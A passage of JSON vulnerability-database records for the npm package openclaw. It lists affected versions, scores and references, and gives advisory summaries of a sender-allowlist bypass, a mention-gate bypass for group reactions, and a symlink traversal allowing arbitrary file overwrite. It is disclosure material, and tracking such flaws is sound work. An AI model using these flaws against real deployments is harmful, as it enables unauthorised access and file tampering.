jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-
k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-
rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-
x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-9vvh-2768-c8vp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5u41-c7kc-u7fe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90072?format=json","vulnerability_id":"VCID-6849-th74-yqd5","summary":"OpenClaw: Google Chat and Zalouser group sender allowlist bypass via policy downgrade\n## Summary\n\nWhen only a route-level group allowlist was configured, sender policy 
resolution silently downgraded from `allowlist` to `open` instead of preserving the configured group policy.\n\n## Impact\n\nAny member of an allowlisted Google Chat space or Zalouser group could interact with the bot even when the operator intended sender-level restrictions.\n\n## Affected Component\n\n`extensions/googlechat/src/monitor-access.ts, extensions/zalouser/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e64a881ae0` (`Channels: preserve routed group policy`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33578","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01537","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01544","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02193","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33578"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI
:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e64a881ae0fb8af18e451163f4c2d611d60cc8e4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-63mg-xp9j-jfcm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33578","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33578"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions","reference_id":"","reference_type":"","scores":[{"value":"4.3","s
coring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-policy-allowlist-bypass-via-policy-downgrade-in-google-chat-and-zalouser-extensions"},{"reference_url":"https://github.com/advisories/GHSA-63mg-xp9j-jfcm","reference_id":"GHSA-63mg-xp9j-jfcm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-63mg-xp9j-jfcm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-g
bhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-x
qa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f
3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33578","GHSA-63mg-xp9j-jfcm"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6849-th74-yqd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91053?format=json","vulnerability_id":"VCID-6bxd-kbse-sudx","summary":"OpenClaw: BlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n## Summary\n\nBlueBubbles Group Reactions Bypass requireMention and Still Enqueue Agent-Visible System Events\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBlueBubbles 
group reaction events previously bypassed `requireMention` and still enqueued agent-visible system events in groups that were supposed to stay mention-gated. Commit `f8c98630785288cc1f1d0893503ef3b653a3cede` subjects the reaction path to the same mention gate as normal group messages.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `f8c98630785288cc1f1d0893503ef3b653a3cede`.\n\n## Fix Commit(s)\n\n- `f8c98630785288cc1f1d0893503ef3b653a3cede`","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f8c98630785288cc1f1d0893503ef3b653a3cede"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mw7w-g3mg-xqm7"},{"reference_url":"https://github.com/advisories/GHSA-mw7w-g3mg-xqm7","reference_id":"GHSA-mw7w-g3mg-xqm7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_e
lements":""}],"url":"https://github.com/advisories/GHSA-mw7w-g3mg-xqm7"}],"fixed_packages":[],"aliases":["GHSA-mw7w-g3mg-xqm7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6bxd-kbse-sudx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91195?format=json","vulnerability_id":"VCID-6rha-8r5p-jyb7","summary":"Duplicate Advisory: OpenClaw has browser trace/download path symlink escape in temp output handling\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-36h3-7c54-j27r. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.25 contain a symlink traversal vulnerability in browser trace and download output path handling that allows local attackers to escape the managed temp root directory. An attacker with local access can create symlinks to route file writes outside the intended temp directory, enabling arbitrary file overwrite on the affected 
system.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/496a76c03ba85e15ea715e5a583e498ae04d36e3","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/496a76c03ba85e15ea715e5a583e498ae04d36e3"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-browser-trace-download-path-handling","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-browser-trace-download-path-handling"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32054","reference_id":"CVE-2026-32054","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/deta
il/CVE-2026-32054"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-36h3-7c54-j27r","reference_id":"GHSA-36h3-7c54-j27r","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-36h3-7c54-j27r"},{"reference_url":"https://github.com/advisories/GHSA-ffr4-mrhv-vfr2","reference_id":"GHSA-ffr4-mrhv-vfr2","reference_type":"","scores":[{"value":"MODERATE",